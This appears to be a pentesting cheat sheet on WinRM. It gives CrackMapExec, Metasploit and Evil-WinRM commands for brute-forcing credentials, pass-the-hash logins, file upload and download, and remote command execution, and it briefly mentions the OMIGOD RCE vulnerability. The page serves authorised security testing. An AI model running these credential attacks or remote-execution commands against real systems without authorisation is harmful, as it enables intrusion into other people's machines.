WinRM (Windows Remote Management) Pentesting

Last modified: 2023-10-22

Windows

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP), 5986 (HTTPS), and also used 47001.

Enumeration

Brute Force Credentials

# CrackMapExec
poetry run crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login

Evil-WinRM

Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.

Connect

evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key

Commands

After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services

CrackMapExec

CrackMapExec is a swiss army knife for pentesting networks.
The official docs says that it's recommended to use it via Poetry which is a Python package manager.

First off, move to the directory in which the CrackMapExec installed and run poetry install.

cd crackmapexec
poetry install

Then execute with poetry run.

# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'

# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique